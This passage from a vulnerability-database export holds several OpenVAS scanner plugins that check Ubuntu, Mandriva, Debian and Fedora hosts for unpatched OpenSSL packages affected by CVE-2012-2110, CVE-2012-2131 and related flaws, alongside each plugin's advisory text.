script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|11\\.10|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1428-1\");\n script_tag(name:\"affected\", value:\"openssl on Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that the fix for CVE-2012-2110 was incomplete for OpenSSL\n 0.9.8. A remote attacker could trigger this flaw in services that used SSL\n to cause a denial of service or possibly execute arbitrary code with\n application privileges. Ubuntu 11.10 was not affected by this issue.\n (CVE-2012-2131)\n\n The original upstream fix for CVE-2012-2110 would cause BUF_MEM_grow_clean()\n to sometimes return the wrong error condition. This update fixes the\n problem.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8k-7ubuntu8.11\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.0e-2ubuntu4.5\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8o-5ubuntu1.5\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-4ubuntu3.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-03T00:00:00", "type": "openvas", "title": "Mandriva Update for openssl0.9.8 MDVSA-2012:064 (openssl0.9.8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2012-2110"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310831657", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831657", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for openssl0.9.8 MDVSA-2012:064 (openssl0.9.8)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:064\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831657\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:58:50 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-2131\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"MDVSA\", value:\"2012:064\");\n script_name(\"Mandriva Update for openssl0.9.8 MDVSA-2012:064 (openssl0.9.8)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl0.9.8'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_2010\\.1\");\n script_tag(name:\"affected\", value:\"openssl0.9.8 on Mandriva Linux 2010.1\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that the fix for CVE-2012-2110 (MDVSA-2012:060)\n was not sufficient to correct the issue for OpenSSL 0.9.8.\n\n The updated packages have been upgraded to the 0.9.8w version which\n is not vulnerable to this issue.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl0.9.8\", rpm:\"libopenssl0.9.8~0.9.8w~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64openssl0.9.8\", rpm:\"lib64openssl0.9.8~0.9.8w~0.1mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:40", "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 2454-2.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2454-2 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2131", "CVE-2012-2110"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231071261", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071261", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2454_2.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2454-2 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71261\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2012-2131\", \"CVE-2012-2110\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:57:59 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2454-2 (openssl)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202454-2\");\n script_tag(name:\"insight\", value:\"Tomas Hoger, Red Hat, discovered that the fix for CVE-2012-2110 for\nthe 0.9.8 series of OpenSSL was incomplete. It has been assigned the\nCVE-2012-2131 identifier.\n\nFor reference, the original description of CVE-2012-2110 from DSA-2454-1\nis quoted below:\n\nCVE-2012-2110\n\nTavis Ormandy, Google Security Team, discovered a vulnerability\nin the way DER-encoded ASN.1 data is parsed that can result in\na heap overflow.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 0.9.8o-4squeeze12.\n\nThe testing distribution (wheezy), and the unstable distribution (sid),\nare not affected by this issue.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your openssl packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to openssl\nannounced via advisory DSA 2454-2.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libcrypto0.9.8-udeb\", ver:\"0.9.8o-4squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8o-4squeeze12\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-12-04T11:19:34", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1424-1", "cvss3": {}, "published": "2012-04-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for openssl USN-1424-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-7250", "CVE-2012-1165", "CVE-2012-2110"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840985", "href": "http://plugins.openvas.org/nasl.php?oid=840985", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1424_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for openssl USN-1424-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that OpenSSL could be made to dereference a NULL pointer\n when processing S/MIME messages. A remote attacker could use this to cause\n a denial of service. These issues did not affect Ubuntu 8.04 LTS.\n (CVE-2006-7250, CVE-2012-1165)\n\n Tavis Ormandy discovered that OpenSSL did not properly perform bounds\n checking when processing DER data via BIO or FILE functions. A remote\n attacker could trigger this flaw in services that used SSL to cause a\n denial of service or possibly execute arbitrary code with application\n privileges. (CVE-2012-2110)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1424-1\";\ntag_affected = \"openssl on Ubuntu 11.10 ,\n Ubuntu 11.04 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1424-1/\");\n script_id(840985);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-20 10:21:13 +0530 (Fri, 20 Apr 2012)\");\n script_cve_id(\"CVE-2006-7250\", \"CVE-2012-1165\", \"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"1424-1\");\n script_name(\"Ubuntu Update for openssl USN-1424-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8k-7ubuntu8.10\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.0e-2ubuntu4.4\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8o-5ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-4ubuntu3.17\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:50", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1424-1", "cvss3": {}, "published": "2012-04-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for openssl USN-1424-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-7250", "CVE-2012-1165", "CVE-2012-2110"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840985", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840985", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1424_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openssl USN-1424-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1424-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840985\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-20 10:21:13 +0530 (Fri, 20 Apr 2012)\");\n script_cve_id(\"CVE-2006-7250\", \"CVE-2012-1165\", \"CVE-2012-2110\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"USN\", value:\"1424-1\");\n script_name(\"Ubuntu Update for openssl USN-1424-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|11\\.10|11\\.04|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1424-1\");\n script_tag(name:\"affected\", value:\"openssl on Ubuntu 11.10,\n Ubuntu 11.04,\n Ubuntu 10.04 LTS,\n Ubuntu 8.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that OpenSSL could be made to dereference a NULL pointer\n when processing S/MIME messages. A remote attacker could use this to cause\n a denial of service. These issues did not affect Ubuntu 8.04 LTS.\n (CVE-2006-7250, CVE-2012-1165)\n\n Tavis Ormandy discovered that OpenSSL did not properly perform bounds\n checking when processing DER data via BIO or FILE functions. A remote\n attacker could trigger this flaw in services that used SSL to cause a\n denial of service or possibly execute arbitrary code with application\n privileges. (CVE-2012-2110)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8k-7ubuntu8.10\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.0e-2ubuntu4.4\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8o-5ubuntu1.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8g-4ubuntu3.17\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:38:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-6403", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1165", "CVE-2012-0050", "CVE-2012-2110", "CVE-2012-0884"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864192", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-6403\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079299.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864192\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 11:08:05 +0530 (Mon, 30 Apr 2012)\");\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-6403\");\n script_name(\"Fedora Update for openssl FEDORA-2012-6403\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"openssl on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0i~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-18T11:06:46", "description": "Check for the Version of openssl", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Fedora Update for openssl FEDORA-2012-6403", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1165", "CVE-2012-0050", "CVE-2012-2110", "CVE-2012-0884"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:864192", "href": "http://plugins.openvas.org/nasl.php?oid=864192", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssl FEDORA-2012-6403\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"openssl on Fedora 16\";\ntag_insight = \"The OpenSSL toolkit provides support for secure communications between\n machines. OpenSSL includes a certificate management tool and shared\n libraries which provide various cryptographic algorithms and\n protocols.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079299.html\");\n script_id(864192);\n script_version(\"$Revision: 8448 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:18:06 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 11:08:05 +0530 (Mon, 30 Apr 2012)\");\n script_cve_id(\"CVE-2012-2110\", \"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-6403\");\n script_name(\"Fedora Update for openssl FEDORA-2012-6403\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.0i~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:34", "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 2454-1.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2454-1 (openssl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1165", "CVE-2011-4619", "CVE-2012-2110", "CVE-2012-0884"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71259", "href": "http://plugins.openvas.org/nasl.php?oid=71259", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2454_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2454-1 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been found in OpenSSL. The Common\nVulnerabilities and Exposures project identifies the following 